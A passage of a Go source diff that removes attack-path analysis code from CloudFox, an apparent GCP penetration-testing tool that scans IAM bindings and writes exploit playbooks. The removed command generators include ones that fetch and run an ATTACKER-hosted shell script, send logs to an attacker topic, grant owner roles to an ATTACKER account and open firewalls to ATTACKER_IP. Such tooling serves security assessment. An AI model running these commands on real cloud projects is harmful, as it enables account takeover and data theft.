service name from the full path - parts := strings.Split(svc.Metadata.Name, "/") - if len(parts) > 0 { - svcName = parts[len(parts)-1] - } - - for _, binding := range policy.Bindings { - permissions := s.getRolePermissions(iamService, binding.Role, projectID) - for _, member := range binding.Members { - memberPaths := s.analyzePermissionsForAttackPaths( - member, binding.Role, permissions, projectID, - "resource", fmt.Sprintf("run-service/%s", svcName), svcName, - pathType, exfilPermMap, lateralPermMap, privescPermMap, - ) - paths = append(paths, memberPaths...) - } - } - } - } - - return paths -} - -// analyzeKMSIAM analyzes IAM policies on KMS keys -func (s *AttackPathService) analyzeKMSIAM(ctx context.Context, projectID, pathType string, exfilPermMap map[string]DataExfilPermission, lateralPermMap map[string]LateralMovementPermission, privescPermMap map[string]PrivescPermission, iamService *iam.Service) []AttackPath { - var paths []AttackPath - - kmsService, err := s.getKMSService(ctx) - if err != nil { - return paths - } - - // List key rings in the project (all locations) - parent := fmt.Sprintf("projects/%s/locations/-", projectID) - keyRings, err := kmsService.Projects.Locations.KeyRings.List(parent).Do() - if err != nil { - return paths - } - - for _, keyRing := range keyRings.KeyRings { - // List crypto keys in this key ring - keys, err := kmsService.Projects.Locations.KeyRings.CryptoKeys.List(keyRing.Name).Do() - if err != nil { - continue - } - - for _, key := range keys.CryptoKeys { - // Get IAM policy for this key - policy, err := kmsService.Projects.Locations.KeyRings.CryptoKeys.GetIamPolicy(key.Name).Do() - if err != nil { - continue - } - - keyName := key.Name - // Extract just the key name from the full path - parts := strings.Split(key.Name, "/") - if len(parts) > 0 { - keyName = parts[len(parts)-1] - } - - for _, binding := range policy.Bindings { - permissions := s.getRolePermissions(iamService, binding.Role, projectID) - for _, member := range binding.Members { - memberPaths := s.analyzePermissionsForAttackPaths( - member, binding.Role, permissions, projectID, - "resource", fmt.Sprintf("kms-key/%s", keyName), keyName, - pathType, exfilPermMap, lateralPermMap, privescPermMap, - ) - paths = append(paths, memberPaths...) - } - } - } - } - - return paths -} - -// analyzePubSubIAM analyzes IAM policies on Pub/Sub topics and subscriptions -func (s *AttackPathService) analyzePubSubIAM(ctx context.Context, projectID, pathType string, exfilPermMap map[string]DataExfilPermission, lateralPermMap map[string]LateralMovementPermission, privescPermMap map[string]PrivescPermission, iamService *iam.Service) []AttackPath { - var paths []AttackPath - - pubsubService, err := s.getPubSubService(ctx) - if err != nil { - return paths - } - - // List topics in the project - project := fmt.Sprintf("projects/%s", projectID) - topics, err := pubsubService.Projects.Topics.List(project).Do() - if err == nil { - for _, topic := range topics.Topics { - // Get IAM policy for this topic - policy, err := pubsubService.Projects.Topics.GetIamPolicy(topic.Name).Do() - if err != nil { - continue - } - - topicName := topic.Name - // Extract just the topic name from the full path - parts := strings.Split(topic.Name, "/") - if len(parts) > 0 { - topicName = parts[len(parts)-1] - } - - for _, binding := range policy.Bindings { - permissions := s.getRolePermissions(iamService, binding.Role, projectID) - for _, member := range binding.Members { - memberPaths := s.analyzePermissionsForAttackPaths( - member, binding.Role, permissions, projectID, - "resource", fmt.Sprintf("topic/%s", topicName), topicName, - pathType, exfilPermMap, lateralPermMap, privescPermMap, - ) - paths = append(paths, memberPaths...) - } - } - } - } - - // List subscriptions in the project - subscriptions, err := pubsubService.Projects.Subscriptions.List(project).Do() - if err == nil { - for _, sub := range subscriptions.Subscriptions { - // Get IAM policy for this subscription - policy, err := pubsubService.Projects.Subscriptions.GetIamPolicy(sub.Name).Do() - if err != nil { - continue - } - - subName := sub.Name - // Extract just the subscription name from the full path - parts := strings.Split(sub.Name, "/") - if len(parts) > 0 { - subName = parts[len(parts)-1] - } - - for _, binding := range policy.Bindings { - permissions := s.getRolePermissions(iamService, binding.Role, projectID) - for _, member := range binding.Members { - memberPaths := s.analyzePermissionsForAttackPaths( - member, binding.Role, permissions, projectID, - "resource", fmt.Sprintf("subscription/%s", subName), subName, - pathType, exfilPermMap, lateralPermMap, privescPermMap, - ) - paths = append(paths, memberPaths...) - } - } - } - } - - return paths -} - -// analyzeSpannerIAM analyzes IAM policies on Spanner instances and databases -func (s *AttackPathService) analyzeSpannerIAM(ctx context.Context, projectID, pathType string, exfilPermMap map[string]DataExfilPermission, lateralPermMap map[string]LateralMovementPermission, privescPermMap map[string]PrivescPermission, iamService *iam.Service) []AttackPath { - var paths []AttackPath - - spannerService, err := s.getSpannerService(ctx) - if err != nil { - return paths - } - - // List instances in the project - parent := fmt.Sprintf("projects/%s", projectID) - instances, err := spannerService.Projects.Instances.List(parent).Do() - if err != nil { - return paths - } - - for _, instance := range instances.Instances { - // Get IAM policy for this instance - policy, err := spannerService.Projects.Instances.GetIamPolicy(instance.Name, &spanner.GetIamPolicyRequest{}).Do() - if err == nil { - instanceName := instance.Name - // Extract just the instance name from the full path - parts := strings.Split(instance.Name, "/") - if len(parts) > 0 { - instanceName = parts[len(parts)-1] - } - - for _, binding := range policy.Bindings { - permissions := s.getRolePermissions(iamService, binding.Role, projectID) - for _, member := range binding.Members { - memberPaths := s.analyzePermissionsForAttackPaths( - member, binding.Role, permissions, projectID, - "resource", fmt.Sprintf("spanner-instance/%s", instanceName), instanceName, - pathType, exfilPermMap, lateralPermMap, privescPermMap, - ) - paths = append(paths, memberPaths...) - } - } - } - - // List databases in this instance - databases, err := spannerService.Projects.Instances.Databases.List(instance.Name).Do() - if err != nil { - continue - } - - for _, db := range databases.Databases { - // Get IAM policy for this database - policy, err := spannerService.Projects.Instances.Databases.GetIamPolicy(db.Name, &spanner.GetIamPolicyRequest{}).Do() - if err != nil { - continue - } - - dbName := db.Name - // Extract just the database name from the full path - parts := strings.Split(db.Name, "/") - if len(parts) > 0 { - dbName = parts[len(parts)-1] - } - - for _, binding := range policy.Bindings { - permissions := s.getRolePermissions(iamService, binding.Role, projectID) - for _, member := range binding.Members { - memberPaths := s.analyzePermissionsForAttackPaths( - member, binding.Role, permissions, projectID, - "resource", fmt.Sprintf("spanner-db/%s", dbName), dbName, - pathType, exfilPermMap, lateralPermMap, privescPermMap, - ) - paths = append(paths, memberPaths...) - } - } - } - } - - return paths -} - -// analyzeComputeInstanceIAM analyzes IAM policies on Compute instances -func (s *AttackPathService) analyzeComputeInstanceIAM(ctx context.Context, projectID, pathType string, exfilPermMap map[string]DataExfilPermission, lateralPermMap map[string]LateralMovementPermission, privescPermMap map[string]PrivescPermission, iamService *iam.Service) []AttackPath { - var paths []AttackPath - - computeService, err := s.getComputeService(ctx) - if err != nil { - return paths - } - - // List all instances across all zones - instances, err := computeService.Instances.AggregatedList(projectID).Do() - if err != nil { - return paths - } - - for zonePath, instanceList := range instances.Items { - if instanceList.Instances == nil { - continue - } - - // Extract zone name from path (e.g., "zones/us-central1-a" -> "us-central1-a") - zone := zonePath - if strings.HasPrefix(zonePath, "zones/") { - zone = strings.TrimPrefix(zonePath, "zones/") - } - - for _, instance := range instanceList.Instances { - // Get IAM policy for this instance - policy, err := computeService.Instances.GetIamPolicy(projectID, zone, instance.Name).Do() - if err != nil { - continue - } - - for _, binding := range policy.Bindings { - permissions := s.getRolePermissions(iamService, binding.Role, projectID) - for _, member := range binding.Members { - memberPaths := s.analyzePermissionsForAttackPaths( - member, binding.Role, permissions, projectID, - "resource", fmt.Sprintf("instance/%s", instance.Name), instance.Name, - pathType, exfilPermMap, lateralPermMap, privescPermMap, - ) - paths = append(paths, memberPaths...) - } - } - } - } - - return paths -} - -// CombinedAttackPathAnalysis performs attack path analysis across all scopes -func (s *AttackPathService) CombinedAttackPathAnalysis(ctx context.Context, projectIDs []string, projectNames map[string]string, pathType string) (*CombinedAttackPathData, error) { - result := &CombinedAttackPathData{ - OrgPaths: []AttackPath{}, - FolderPaths: []AttackPath{}, - ProjectPaths: []AttackPath{}, - ResourcePaths: []AttackPath{}, - AllPaths: []AttackPath{}, - OrgNames: make(map[string]string), - FolderNames: make(map[string]string), - OrgIDs: []string{}, - } - - // Analyze organization-level IAM - orgPaths, orgNames, orgIDs, err := s.AnalyzeOrganizationAttackPaths(ctx, pathType) - if err != nil { - gcpinternal.HandleGCPError(err, logger, globals.GCP_DATAEXFILTRATION_MODULE_NAME, "Could not analyze organization attack paths") - } else { - result.OrgPaths = orgPaths - result.OrgNames = orgNames - result.OrgIDs = orgIDs - result.AllPaths = append(result.AllPaths, orgPaths...) - } - - // Analyze folder-level IAM - folderPaths, folderNames, err := s.AnalyzeFolderAttackPaths(ctx, pathType) - if err != nil { - gcpinternal.HandleGCPError(err, logger, globals.GCP_DATAEXFILTRATION_MODULE_NAME, "Could not analyze folder attack paths") - } else { - result.FolderPaths = folderPaths - result.FolderNames = folderNames - result.AllPaths = append(result.AllPaths, folderPaths...) - } - - // Analyze project-level IAM and resource-level IAM for each project - for _, projectID := range projectIDs { - projectName := projectID - if name, ok := projectNames[projectID]; ok { - projectName = name - } - - // Project-level - projectPathsList, err := s.AnalyzeProjectAttackPaths(ctx, projectID, projectName, pathType) - if err != nil { - gcpinternal.HandleGCPError(err, logger, globals.GCP_DATAEXFILTRATION_MODULE_NAME, - fmt.Sprintf("Could not analyze attack paths for project %s", projectID)) - continue - } - result.ProjectPaths = append(result.ProjectPaths, projectPathsList...) - result.AllPaths = append(result.AllPaths, projectPathsList...) - - // Resource-level - resourcePaths, err := s.AnalyzeResourceAttackPaths(ctx, projectID, pathType) - if err != nil { - gcpinternal.HandleGCPError(err, logger, globals.GCP_DATAEXFILTRATION_MODULE_NAME, - fmt.Sprintf("Could not analyze resource attack paths for project %s", projectID)) - continue - } - result.ResourcePaths = append(result.ResourcePaths, resourcePaths...) - result.AllPaths = append(result.AllPaths, resourcePaths...) - } - - return result, nil -} - -// Helper functions - -func (s *AttackPathService) getPermissionMaps(pathType string) (map[string]DataExfilPermission, map[string]LateralMovementPermission, map[string]PrivescPermission) { - exfilPermMap := make(map[string]DataExfilPermission) - lateralPermMap := make(map[string]LateralMovementPermission) - privescPermMap := make(map[string]PrivescPermission) - - if pathType == "exfil" || pathType == "all" { - for _, p := range GetDataExfilPermissions() { - exfilPermMap[p.Permission] = p - } - } - - if pathType == "lateral" || pathType == "all" { - for _, p := range GetLateralMovementPermissions() { - lateralPermMap[p.Permission] = p - } - } - - if pathType == "privesc" || pathType == "all" { - for _, p := range GetPrivescPermissions() { - privescPermMap[p.Permission] = p - } - } - - return exfilPermMap, lateralPermMap, privescPermMap -} - -func (s *AttackPathService) getRolePermissions(iamService *iam.Service, role string, projectID string) []string { - if iamService == nil { - return []string{} - } - - ctx := context.Background() - var roleInfo *iam.Role - var err error - - if strings.HasPrefix(role, "roles/") { - roleInfo, err = iamService.Roles.Get(role).Do() - } else if strings.HasPrefix(role, "projects/") { - roleInfo, err = iamService.Projects.Roles.Get(role).Do() - } else if strings.HasPrefix(role, "organizations/") { - roleInfo, err = iamService.Organizations.Roles.Get(role).Do() - } else { - roleInfo, err = iamService.Roles.Get("roles/" + role).Do() - } - - if err != nil { - return s.getTestablePermissions(ctx, iamService, role, projectID) - } - - return roleInfo.IncludedPermissions -} - -func (s *AttackPathService) getTestablePermissions(ctx context.Context, iamService *iam.Service, role string, projectID string) []string { - // Return known permissions for common roles - knownRoles := map[string][]string{ - "roles/owner": { - "storage.objects.get", "storage.objects.list", "bigquery.tables.getData", - "compute.images.create", "compute.snapshots.create", "logging.sinks.create", - "compute.networks.addPeering", "compute.instances.setMetadata", - }, - "roles/editor": { - "storage.objects.get", "storage.objects.list", "bigquery.tables.getData", - "compute.images.create", "compute.snapshots.create", - "compute.instances.setMetadata", - }, - "roles/storage.objectViewer": { - "storage.objects.get", "storage.objects.list", - }, - "roles/bigquery.dataViewer": { - "bigquery.tables.getData", - }, - } - - if perms, ok := knownRoles[role]; ok { - return perms - } - return []string{} -} - -func (s *AttackPathService) analyzePermissionsForAttackPaths( - member, role string, permissions []string, projectID, - scopeType, scopeID, scopeName, pathType string, - exfilPermMap map[string]DataExfilPermission, - lateralPermMap map[string]LateralMovementPermission, - privescPermMap map[string]PrivescPermission, -) []AttackPath { - var paths []AttackPath - - // Skip allUsers/allAuthenticatedUsers for permission-based analysis - if member == "allUsers" || member == "allAuthenticatedUsers" { - return paths - } - - principalType := extractPrincipalType(member) - principal := extractPrincipalEmail(member) - - // Check for exfil permissions - for _, perm := range permissions { - if exfilPerm, ok := exfilPermMap[perm]; ok { - path := AttackPath{ - Principal: principal, - PrincipalType: principalType, - Method: perm, - TargetResource: scopeName, - Permissions: []string{perm}, - Category: exfilPerm.Category, - RiskLevel: exfilPerm.RiskLevel, - Description: exfilPerm.Description, - ExploitCommand: GenerateExfilCommand(perm, projectID, scopeID), - ProjectID: projectID, - ScopeType: scopeType, - ScopeID: scopeID, - ScopeName: scopeName, - PathType: "exfil", - } - paths = append(paths, path) - } - } - - // Check for lateral movement permissions - for _, perm := range permissions { - if lateralPerm, ok := lateralPermMap[perm]; ok { - path := AttackPath{ - Principal: principal, - PrincipalType: principalType, - Method: perm, - TargetResource: scopeName, - Permissions: []string{perm}, - Category: lateralPerm.Category, - RiskLevel: lateralPerm.RiskLevel, - Description: lateralPerm.Description, - ExploitCommand: GenerateLateralCommand(perm, projectID, scopeID), - ProjectID: projectID, - ScopeType: scopeType, - ScopeID: scopeID, - ScopeName: scopeName, - PathType: "lateral", - } - paths = append(paths, path) - } - } - - // Check for privesc permissions - for _, perm := range permissions { - if privescPerm, ok := privescPermMap[perm]; ok { - path := AttackPath{ - Principal: principal, - PrincipalType: principalType, - Method: perm, - TargetResource: scopeName, - Permissions: []string{perm}, - Category: privescPerm.Category, - RiskLevel: privescPerm.RiskLevel, - Description: privescPerm.Description, - ExploitCommand: GeneratePrivescCommand(perm, projectID, scopeID), - ProjectID: projectID, - ScopeType: scopeType, - ScopeID: scopeID, - ScopeName: scopeName, - PathType: "privesc", - } - paths = append(paths, path) - } - } - - return paths -} - -func extractPrincipalType(member string) string { - if strings.HasPrefix(member, "user:") { - return "user" - } else if strings.HasPrefix(member, "serviceAccount:") { - return "serviceAccount" - } else if strings.HasPrefix(member, "group:") { - return "group" - } else if strings.HasPrefix(member, "domain:") { - return "domain" - } - return "unknown" -} - -func extractPrincipalEmail(member string) string { - parts := strings.SplitN(member, ":", 2) - if len(parts) == 2 { - return parts[1] - } - return member -} - -// GenerateExfilCommand generates an exploit command for a data exfiltration permission -func GenerateExfilCommand(permission, projectID, scopeID string) string { - switch permission { - case "compute.images.create": - return fmt.Sprintf("gcloud compute images create exfil-image --source-disk=DISK --source-disk-zone=ZONE --project=%s", projectID) - case "compute.snapshots.create": - return fmt.Sprintf("gcloud compute snapshots create exfil-snap --source-disk=DISK --source-disk-zone=ZONE --project=%s", projectID) - case "logging.sinks.create": - return fmt.Sprintf("gcloud logging sinks create exfil-sink pubsub.googleapis.com/projects/ATTACKER/topics/logs --project=%s", projectID) - case "storage.objects.get": - return fmt.Sprintf("gsutil cp gs://%s/OBJECT ./local --project=%s", scopeID, projectID) - case "bigquery.tables.getData": - return fmt.Sprintf("bq query --use_legacy_sql=false 'SELECT * FROM `%s.TABLE`'", scopeID) - case "secretmanager.versions.access": - return fmt.Sprintf("gcloud secrets versions access latest --secret=SECRET --project=%s", projectID) - default: - return fmt.Sprintf("# %s - refer to GCP documentation", permission) - } -} - -// GenerateLateralCommand generates an exploit command for a lateral movement permission -func GenerateLateralCommand(permission, projectID, scopeID string) string { - switch permission { - case "compute.networks.addPeering": - return fmt.Sprintf("gcloud compute networks peerings create peering --network=NET --peer-network=projects/TARGET/global/networks/NET --project=%s", projectID) - case "compute.instances.osLogin": - return fmt.Sprintf("gcloud compute ssh INSTANCE --zone=ZONE --project=%s", projectID) - case "compute.instances.setMetadata": - return fmt.Sprintf("gcloud compute instances add-metadata INSTANCE --zone=ZONE --metadata=ssh-keys=\"user:$(cat ~/.ssh/id_rsa.pub)\" --project=%s", projectID) - case "iam.serviceAccounts.getAccessToken": - return fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", scopeID) - case "container.clusters.getCredentials": - return fmt.Sprintf("gcloud container clusters get-credentials CLUSTER --zone=ZONE --project=%s", projectID) - default: - return fmt.Sprintf("# %s - refer to GCP documentation", permission) - } -} - -// GeneratePrivescCommand generates an exploit command for a privilege escalation permission -func GeneratePrivescCommand(permission, projectID, scopeID string) string { - switch permission { - // Service Account Impersonation - case "iam.serviceAccounts.getAccessToken": - return fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=TARGET_SA@%s.iam.gserviceaccount.com", projectID) - case "iam.serviceAccounts.signBlob": - return fmt.Sprintf("gcloud iam service-accounts sign-blob input.txt output.sig --iam-account=TARGET_SA@%s.iam.gserviceaccount.com", projectID) - case "iam.serviceAccounts.signJwt": - return fmt.Sprintf("gcloud iam service-accounts sign-jwt jwt.json signed.jwt --iam-account=TARGET_SA@%s.iam.gserviceaccount.com", projectID) - case "iam.serviceAccounts.implicitDelegation": - return fmt.Sprintf("# Chain through intermediary SA: gcloud auth print-access-token --impersonate-service-account=TARGET_SA@%s.iam.gserviceaccount.com", projectID) - case "iam.serviceAccounts.getOpenIdToken": - return fmt.Sprintf("gcloud auth print-identity-token --impersonate-service-account=TARGET_SA@%s.iam.gserviceaccount.com --audiences=https://TARGET", projectID) - - // Key Creation - case "iam.serviceAccountKeys.create": - return fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=TARGET_SA@%s.iam.gserviceaccount.com", projectID) - case "iam.serviceAccountKeys.delete": - return fmt.Sprintf("gcloud iam service-accounts keys delete KEY_ID --iam-account=TARGET_SA@%s.iam.gserviceaccount.com", projectID) - case "storage.hmacKeys.create": - return fmt.Sprintf("gcloud storage hmac create TARGET_SA@%s.iam.gserviceaccount.com", projectID) - case "apikeys.keys.create": - return fmt.Sprintf("gcloud alpha services api-keys create --project=%s", projectID) - - // IAM Policy Modification - case "resourcemanager.projects.setIamPolicy": - return fmt.Sprintf("gcloud projects add-iam-policy-binding %s --member=user:ATTACKER@gmail.com --role=roles/owner", projectID) - case "resourcemanager.folders.setIamPolicy": - return fmt.Sprintf("gcloud resource-manager folders add-iam-policy-binding %s --member=user:ATTACKER@gmail.com --role=roles/owner", scopeID) - case "resourcemanager.organizations.setIamPolicy": - return fmt.Sprintf("gcloud organizations add-iam-policy-binding %s --member=user:ATTACKER@gmail.com --role=roles/owner", scopeID) - case "iam.serviceAccounts.setIamPolicy": - return fmt.Sprintf("gcloud iam service-accounts add-iam-policy-binding %s --member=user:ATTACKER@gmail.com --role=roles/iam.serviceAccountTokenCreator", scopeID) - case "iam.roles.update": - return fmt.Sprintf("gcloud iam roles update ROLE_ID --project=%s --add-permissions=iam.serviceAccounts.getAccessToken", projectID) - case "iam.roles.create": - return fmt.Sprintf("gcloud iam roles create privesc_role --project=%s --permissions=iam.serviceAccounts.getAccessToken,iam.serviceAccountKeys.create", projectID) - - // Resource-level IAM - case "storage.buckets.setIamPolicy": - return fmt.Sprintf("gsutil iam ch user:ATTACKER@gmail.com:objectAdmin gs://%s", scopeID) - case "pubsub.topics.setIamPolicy": - return fmt.Sprintf("gcloud pubsub topics add-iam-policy-binding %s --member=user:ATTACKER@gmail.com --role=roles/pubsub.publisher --project=%s", scopeID, projectID) - case "bigquery.datasets.setIamPolicy": - return fmt.Sprintf("bq update --source=dataset_acl.json %s:%s", projectID, scopeID) - case "secretmanager.secrets.setIamPolicy": - return fmt.Sprintf("gcloud secrets add-iam-policy-binding %s --member=user:ATTACKER@gmail.com --role=roles/secretmanager.secretAccessor --project=%s", scopeID, projectID) - case "kms.cryptoKeys.setIamPolicy": - return fmt.Sprintf("gcloud kms keys add-iam-policy-binding KEY --keyring=KEYRING --location=LOCATION --member=user:ATTACKER@gmail.com --role=roles/cloudkms.cryptoKeyDecrypter --project=%s", projectID) - - // Compute - case "compute.instances.create": - return fmt.Sprintf("gcloud compute instances create pwn-vm --service-account=TARGET_SA@%s.iam.gserviceaccount.com --scopes=cloud-platform --zone=us-central1-a --project=%s", projectID, projectID) - case "compute.instances.setServiceAccount": - return fmt.Sprintf("gcloud compute instances set-service-account INSTANCE --service-account=TARGET_SA@%s.iam.gserviceaccount.com --zone=ZONE --project=%s", projectID, projectID) - case "compute.instances.setMetadata": - return fmt.Sprintf("gcloud compute instances add-metadata INSTANCE --zone=ZONE --metadata=startup-script='curl http://ATTACKER/shell.sh|bash' --project=%s", projectID) - case "compute.projects.setCommonInstanceMetadata": - return fmt.Sprintf("gcloud compute project-info add-metadata --metadata=ssh-keys=\"attacker:$(cat ~/.ssh/id_rsa.pub)\" --project=%s", projectID) - case "compute.instances.osLogin": - return fmt.Sprintf("gcloud compute ssh INSTANCE --zone=ZONE --project=%s", projectID) - case "compute.instances.osAdminLogin": - return fmt.Sprintf("gcloud compute ssh INSTANCE --zone=ZONE --project=%s # Then: sudo su", projectID) - case "compute.instanceTemplates.create": - return fmt.Sprintf("gcloud compute instance-templates create pwn-template --service-account=TARGET_SA@%s.iam.gserviceaccount.com --scopes=cloud-platform --project=%s", projectID, projectID) - - // Cloud Functions - case "cloudfunctions.functions.create": - return fmt.Sprintf("gcloud functions deploy pwn --runtime=python39 --trigger-http --service-account=TARGET_SA@%s.iam.gserviceaccount.com --entry-point=main --source=. --project=%s", projectID, projectID) - case "cloudfunctions.functions.update": - return fmt.Sprintf("gcloud functions deploy EXISTING_FUNC --service-account=TARGET_SA@%s.iam.gserviceaccount.com --project=%s", projectID, projectID) - case "cloudfunctions.functions.sourceCodeSet": - return fmt.Sprintf("gcloud functions deploy FUNC --source=gs://ATTACKER_BUCKET/malicious.zip --project=%s", projectID) - case "cloudfunctions.functions.setIamPolicy": - return fmt.Sprintf("gcloud functions add-iam-policy-binding FUNC --member=allUsers --role=roles/cloudfunctions.invoker --project=%s", projectID) - - // Cloud Run - case "run.services.create": - return fmt.Sprintf("gcloud run deploy pwn --image=ATTACKER_IMAGE --service-account=TARGET_SA@%s.iam.gserviceaccount.com --allow-unauthenticated --region=us-central1 --project=%s", projectID, projectID) - case "run.services.update": - return fmt.Sprintf("gcloud run services update SERVICE --service-account=TARGET_SA@%s.iam.gserviceaccount.com --region=us-central1 --project=%s", projectID, projectID) - case "run.jobs.create": - return fmt.Sprintf("gcloud run jobs create pwn-job --image=ATTACKER_IMAGE --service-account=TARGET_SA@%s.iam.gserviceaccount.com --region=us-central1 --project=%s", projectID, projectID) - case "run.jobs.run": - return fmt.Sprintf("gcloud run jobs execute JOB_NAME --region=us-central1 --project=%s", projectID) - - // Data Processing - case "dataproc.clusters.create": - return fmt.Sprintf("gcloud dataproc clusters create pwn-cluster --service-account=TARGET_SA@%s.iam.gserviceaccount.com --region=us-central1 --project=%s", projectID, projectID) - case "dataproc.jobs.create": - return fmt.Sprintf("gcloud dataproc jobs submit pyspark gs://ATTACKER/pwn.py --cluster=CLUSTER --region=us-central1 --project=%s", projectID) - case "dataflow.jobs.create": - return fmt.Sprintf("gcloud dataflow jobs run pwn-job --gcs-location=gs://dataflow-templates/latest/... --service-account-email=TARGET_SA@%s.iam.gserviceaccount.com --region=us-central1 --project=%s", projectID, projectID) - - // AI/ML - case "notebooks.instances.create": - return fmt.Sprintf("gcloud notebooks instances create pwn-notebook --location=us-central1-a --service-account=TARGET_SA@%s.iam.gserviceaccount.com --project=%s", projectID, projectID) - case "aiplatform.customJobs.create": - return fmt.Sprintf("gcloud ai custom-jobs create --display-name=pwn-job --worker-pool-spec=... --service-account=TARGET_SA@%s.iam.gserviceaccount.com --region=us-central1 --project=%s", projectID, projectID) - - // Orchestration - case "composer.environments.create": - return fmt.Sprintf("gcloud composer environments create pwn-env --location=us-central1 --service-account=TARGET_SA@%s.iam.gserviceaccount.com --project=%s", projectID, projectID) - case "cloudscheduler.jobs.create": - return fmt.Sprintf("gcloud scheduler jobs create http pwn-job --schedule='* * * * *' --uri=https://TARGET --oidc-service-account-email=TARGET_SA@%s.iam.gserviceaccount.com --project=%s", projectID, projectID) - case "cloudtasks.tasks.create": - return fmt.Sprintf("gcloud tasks create-http-task --queue=QUEUE --url=https://TARGET --oidc-service-account-email=TARGET_SA@%s.iam.gserviceaccount.com --project=%s", projectID, projectID) - - // CI/CD - case "cloudbuild.builds.create": - return fmt.Sprintf("gcloud builds submit --config=cloudbuild.yaml --project=%s # cloudbuild.yaml runs as Cloud Build SA", projectID) - case "source.repos.update": - return fmt.Sprintf("gcloud source repos clone REPO --project=%s # Modify code for build injection", projectID) - - // Deployment Manager - case "deploymentmanager.deployments.create": - return fmt.Sprintf("gcloud deployment-manager deployments create pwn-deploy --config=config.yaml --project=%s # config.yaml creates privileged resources", projectID) - - // GKE - case "container.clusters.create": - return fmt.Sprintf("gcloud container clusters create pwn-cluster --service-account=TARGET_SA@%s.iam.gserviceaccount.com --zone=us-central1-a --project=%s", projectID, projectID) - case "container.clusters.getCredentials": - return fmt.Sprintf("gcloud container clusters get-credentials CLUSTER --zone=ZONE --project=%s", projectID) - case "container.pods.create": - return fmt.Sprintf("kubectl run pwn --image=ATTACKER_IMAGE --serviceaccount=TARGET_SA") - case "container.pods.exec": - return "kubectl exec -it POD -- /bin/sh # Then: cat /var/run/secrets/kubernetes.io/serviceaccount/token" - case "container.secrets.get": - return "kubectl get secret SECRET -o jsonpath='{.data}' | base64 -d" - case "container.serviceAccounts.createToken": - return "kubectl create token SERVICE_ACCOUNT --duration=999999h" - - // Secrets - case "secretmanager.versions.access": - return fmt.Sprintf("gcloud secrets versions access latest --secret=SECRET_NAME --project=%s", projectID) - - // Workload Identity Federation - case "iam.workloadIdentityPools.create": - return fmt.Sprintf("gcloud iam workload-identity-pools create pwn-pool --location=global --project=%s", projectID) - case "iam.workloadIdentityPoolProviders.create": - return fmt.Sprintf("gcloud iam workload-identity-pools providers create-oidc pwn-provider --location=global --workload-identity-pool=POOL --issuer-uri=https://ATTACKER --project=%s", projectID) - - // Org Policies - case "orgpolicy.policy.set": - return fmt.Sprintf("gcloud org-policies set-policy policy.yaml --project=%s # Disable constraints like requireOsLogin", projectID) - - // SA Usage - case "iam.serviceAccounts.actAs": - return fmt.Sprintf("# Required alongside compute/serverless create permissions to attach SA") - - // Network Access - case "iap.tunnelInstances.accessViaIAP": - return fmt.Sprintf("gcloud compute start-iap-tunnel INSTANCE PORT --zone=ZONE --project=%s", projectID) - case "compute.firewalls.create": - return fmt.Sprintf("gcloud compute firewall-rules create allow-attacker --network=default --allow=tcp:22,tcp:3389 --source-ranges=ATTACKER_IP/32 --project=%s", projectID) - - default: - return fmt.Sprintf("# %s - refer to GCP documentation for exploitation", permission) - } -} - -// GeneratePrivescPlaybook generates a comprehensive privilege escalation playbook from attack paths -func GeneratePrivescPlaybook(paths []AttackPath, identityHeader string) string { - if len(paths) == 0 { - return "" - } - - var sections strings.Builder - if identityHeader != "" { - sections.WriteString(fmt.Sprintf(`# Privilege Escalation Playbook for %s -# Generated by CloudFox -# -# This playbook provides exploitation techniques for identified privilege escalation paths. - -`, identityHeader)) - } else { - sections.WriteString(`# GCP Privilege Escalation Playbook -# Generated by CloudFox -# -# This playbook provides exploitation techniques for identified privilege escalation paths. - -`) - } - - // Group paths by category - categories := map[string][]AttackPath{ - "SA Impersonation": {}, - "Key Creation": {}, - "IAM Modification": {}, - "Compute": {}, - "Serverless": {}, - "Data Processing": {}, - "AI/ML": {}, - "Orchestration": {}, - "CI/CD": {}, - "IaC": {}, - "GKE": {}, - "Secrets": {}, - "Federation": {}, - "Org Policy": {}, - "Network Access": {}, - "SA Usage": {}, - "Billing": {}, - } - - for _, path := range paths { - if _, ok := categories[path.Category]; ok { - categories[path.Category] = append(categories[path.Category], path) - } - } - - // Service Account Impersonation - if len(categories["SA Impersonation"]) > 0 { - sections.WriteString("## Service Account Impersonation\n\n") - sections.WriteString("Principals with SA impersonation capabilities can generate tokens and act as service accounts.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["SA Impersonation"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s at %s\n", path.Principal, path.PrincipalType, path.Method, path.ScopeName)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Generate access token for a service account (iam.serviceAccounts.getAccessToken)\n") - sections.WriteString("gcloud auth print-access-token --impersonate-service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n\n") - sections.WriteString("# Sign a blob as the SA (iam.serviceAccounts.signBlob)\n") - sections.WriteString("echo 'data' | gcloud iam service-accounts sign-blob - signed.txt \\\n") - sections.WriteString(" --iam-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n\n") - sections.WriteString("# Sign a JWT as the SA (iam.serviceAccounts.signJwt)\n") - sections.WriteString("gcloud iam service-accounts sign-jwt input.json output.jwt \\\n") - sections.WriteString(" --iam-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n\n") - sections.WriteString("# Generate OIDC token (iam.serviceAccounts.getOpenIdToken)\n") - sections.WriteString("gcloud auth print-identity-token --impersonate-service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n") - sections.WriteString("```\n\n") - } - - // Key Creation - if len(categories["Key Creation"]) > 0 { - sections.WriteString("## Persistent Key Creation\n\n") - sections.WriteString("Principals with key creation capabilities can create long-lived credentials.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["Key Creation"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create persistent SA key (iam.serviceAccountKeys.create)\n") - sections.WriteString("gcloud iam service-accounts keys create key.json \\\n") - sections.WriteString(" --iam-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n\n") - sections.WriteString("# Use the key\n") - sections.WriteString("gcloud auth activate-service-account --key-file=key.json\n\n") - sections.WriteString("# Create HMAC key for S3-compatible access (storage.hmacKeys.create)\n") 